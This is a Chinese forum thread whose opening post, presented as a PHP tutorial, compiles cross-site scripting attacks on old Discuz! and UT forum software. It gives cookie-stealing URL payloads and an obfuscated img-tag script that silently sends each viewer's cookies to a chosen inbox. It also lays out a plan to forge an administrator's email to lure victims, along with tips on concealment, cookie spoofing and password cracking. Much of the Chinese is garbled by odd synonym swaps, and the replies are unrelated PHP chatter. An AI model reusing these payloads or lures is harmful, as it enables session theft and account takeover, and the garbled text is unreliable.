仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 2407|回复: 18
打印 上一主题 下一主题

[学习教程] PHP网页编程之Discuz!跨站大全

[复制链接]
蒙在股里 该用户已被删除
跳转到指定楼层
#
发表于 2015-2-4 00:26:54 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
根据功能来进行封装等。很多的不懂,在使用搜索引擎查找,或者请教老师和在老师详细的讲解、指导下,都能顺利解决。   在discuz!的发贴、回贴、PM等中的subject都没有经由过滤,所以也能够添加代码。
例如
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22

后果是起首弹出本人的cookie
使用办法:把上述代码放置到img中。

合用版本:discuz!2.x
discuz!3.x
一种使用discuz!2.0破绽停止棍骗取得cookie的测验考试

经由过程测试XXXFan服装论坛的PM功效存在一个平安破绽,详细描写以下:
XXXFan的给某个会员发送悄然的链接以下(假定这个会员名字为XXXFan)
http://XXX/pm.php?action=send&username=XXXFan

由于服装论坛法式对会员名字没有停止过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字前面加上script代码。例如

http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document..cookie)</script><b%20"

下面的链接点击今后起首弹出的是本人的cookie内容。
固然咱们可以先在本人的站点上机关一个法式来搜集cookie,相似于
getcookie.php?cookie=

然而若何来诱使会员点击呢,假如复杂的放在服装论坛上,太轻易被辨认。所以可以使用discuz服装论坛法式的别的一个功效,“帖子引见给伴侣”功效。

由于discuz的这个功效对填写的emial地址没有停止任何过滤、分辨和模版,可以捏造任何人给他人发信,平安性很高。使用这个功效咱们就能够捏造ExploitFan的办理员给某个会员发一封信,诱使会员点击咱们筹办的URL,假如诱使就看本人的手腕了,例如可以说“服装论坛正在测试新功效,请您协助点击下面地址,咱们会在后台纪录您的点击在适合的工夫会给您增添积分以做嘉奖”等等。

由于链接地址是XXXFan的,并且发信人和邮件地址都是XXXFan的官方地址,所以可托度十分高,并且不会留下任何痛处。固然为了更高的平安性,可以在<script>里的内容加密,以进一步增添荫蔽性。

至于失掉cookie若何做,可以测验考试cookie棍骗或是暴力破解MD5暗码

本办法合用于大局部利用discuz2.0的服装论坛,至于discuz3.0的使用办法请介入在我之前宣布的discuz!悄然话破绽
【BUG】Discuz!投票的BUG
投票可以用
misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n
(n为选项,从0入手下手)
的体例经由过程URL来直接投票

然而假如n>最大选项呢,嘻嘻~
照样提交胜利,不外增添了一个题目为空的选项

后果见:
http://discuz.net/viewthread.php?tid=20020&sid=dymPEc
(谁人最初的空白的是我刚加的)

该破绽存在的版本:
Discuz!3.X
Discuz!2.X(能够,没有测试过)
Discuz!的代码破绽
这是接着昨天发明的破绽所睁开的,第一发明者(PK0909)。

详细的描写就不说了,上面是一个复杂的测试代码。

http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E

下面的代码是显示出本人的cookie

上面是在某个对照着名的服装论坛的测试代码,不管谁观察该网页城市把cookie送到指定的会员短信箱里,荫蔽性很好,就是假如有人援用你的贴,哈哈~这里城市跑出来,露馅了

[ img]http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document..cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img]
发明discuz!UT 跨域站点的剧本破绽--短动静篇有关跨域站点的剧本破绽,已算长短常平成并广泛的破绽了。
有关详细的动静可以参阅:
http://www.cert.org/advisories/CA-2000-02.html
上面针对Discuz、UT服装论坛法式的悄然话局部加以申明

破绽顺应版本:
Discuz1.X
Discuz!2.0(0609,0820版)
Discuz!3.X
UT 1.0

破绽描写:

discuz!给指定会员发送悄然话利用的是相似http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的语句,然而name没有经由过滤直接显示在发送短动静的页面中,这就给偷cookie或更严重的损坏翻开了便利之门。

Discuz!3.X已改成http://XXX.net/pm.php?action=send&uid=XXXX相似的语句,防止了这个破绽,然而在选择短信文件夹的时分却没有经由过滤。一样发生了下面的破绽



http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document..cookie)%3C/script%3E%3Cb%22[/url]
,下面的例子是显示本人的cookie。(针对Discuz!1.X Discuz!2.X)

http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22
显示本人的cookie。(针对Discuz!3.X)

UT固然在主题上经由了过滤,也就是说把%27转换为';然而其收件人却没有过滤,所以一样有相似的破绽。例子略。(在分歧的UT服装论坛上发明其代码不尽不异,然而总的来讲都有相似的破绽)


伤害度:中弱

预防举措:
点击超等链接时请注重其真实内容。更多的平安补钉请亲切存眷官方服装论坛。  你的留言本应该加入注册以及分页功能了,而如果你更强的话,UI(用户界面)也可以加强,完成之后,感觉是不是特有成就感?不管怎么样,咱好歹是写了一个动态网站程序了,放在自己的网站上耍耍吧。
透明 该用户已被删除
18#
发表于 2015-6-10 14:43:08 | 只看该作者
做为1门年轻的语言,php一直很努力。
活着的死人 该用户已被删除
17#
发表于 2015-5-5 19:31:49 | 只看该作者
我还是推荐用firefox ,配上firebug 插件调试js能省下不受时间。谷歌的浏览器最好也不少用,因为谷歌的大侠们实在是太天才啦,把一些原来的js代码加了一些特效。
分手快乐 该用户已被删除
16#
发表于 2015-4-27 21:57:28 | 只看该作者
使用zendstdio 写代码的的时候,把tab 的缩进设置成4个空格是很有必要的
不帅 该用户已被删除
15#
发表于 2015-4-27 14:20:54 | 只看该作者
先学习php和mysql,还有css(html语言很简单)我认为现在的效果比以前的方法好。
变相怪杰 该用户已被删除
14#
发表于 2015-4-26 14:11:01 | 只看该作者
当留言板完成的时候,下步可以把做1个单人的blog程序,做为目标,
13#
发表于 2015-4-22 04:09:47 | 只看该作者
其实没啥难的,多练习,练习写程序,真正的实践比看100遍都有用。不过要熟悉引擎
灵魂腐蚀 该用户已被删除
12#
发表于 2015-4-13 01:58:29 | 只看该作者
作为一个合格的coder 编码的规范是必须,命名方面我推崇“驼峰法”,另外就是自己写的代码最好要带注释,不然时间长了,就算是自己的代码估计看起来都费事,更不用说别人拉。
蒙在股里 该用户已被删除
11#
 楼主| 发表于 2015-4-8 23:31:23 | 只看该作者
首先声明:我是一个菜鸟,是一个初学者。学习了一段php后总是感觉自己没有提高,无奈。经过反思我认为我学习过程中存在很多问题,我改变了学习方法后自我感觉有了明显的进步。
若相依 该用户已被删除
10#
发表于 2015-3-23 17:59:15 | 只看该作者
刚开始安装php的时候,我图了个省事,把php的扩展全都打开啦(就是把php.ini 那一片 extension 前面的冒号全去掉啦),这样自然有好处,以后不用再需要什么功能再来打开。
愤怒的大鸟 该用户已被删除
9#
发表于 2015-3-18 06:53:42 | 只看该作者
这些都是最基本最常用功能,我们这些菜鸟在系统学习后,可以先对这些功能深入研究。
莫相离 该用户已被删除
8#
发表于 2015-3-17 06:04:56 | 只看该作者
使用 jquery 等js框架的时候,要随时注意浏览器的更新情况,不然很容易发生框架不能使用。
飘飘悠悠 该用户已被删除
7#
发表于 2015-3-13 23:07:27 | 只看该作者
对于初学者来说不推荐去拿钱买的。当然如果一个网站你经常去用,而且里面的资料也比较有用,最好还是买个会员比较好,毕竟那些也是别人的工作成果。
深爱那片海 该用户已被删除
6#
发表于 2015-3-7 00:16:40 | 只看该作者
,熟悉html,能用div+css,还有javascript,优先考虑linux。我在开始学习的时候,就想把这些知识一起学习,我天真的认为同时学习能够互相呼应,因为知识是相通的。
若天明 该用户已被删除
5#
发表于 2015-3-5 16:32:25 | 只看该作者
本文当是我的笔记啦,遇到的问题随时填充
兰色精灵 该用户已被删除
地板
发表于 2015-3-2 11:58:50 | 只看该作者
我学习了一段时间后,我发现效果并不好(估计是我自身的问题)。因为一个人的精力总是有限的,同时学习这么多,会导致每个的学习时间都得不到保证。
再见西城 该用户已被删除
板凳
发表于 2015-2-11 12:21:38 | 只看该作者
使用zendstdio 写代码的的时候,把tab 的缩进设置成4个空格是很有必要的
第二个灵魂 该用户已被删除
沙发
发表于 2015-2-9 23:02:57 | 只看该作者
当留言板完成的时候,下步可以把做1个单人的blog程序,做为目标,
冷月葬花魂 该用户已被删除
楼主
发表于 2015-2-4 13:08:58 | 只看该作者
至于模板嘛,各位高人一直以来就是争论不休,我一只小菜鸟就不加入战团啦,咱们新手还是多学点东西的好。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 21:11

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表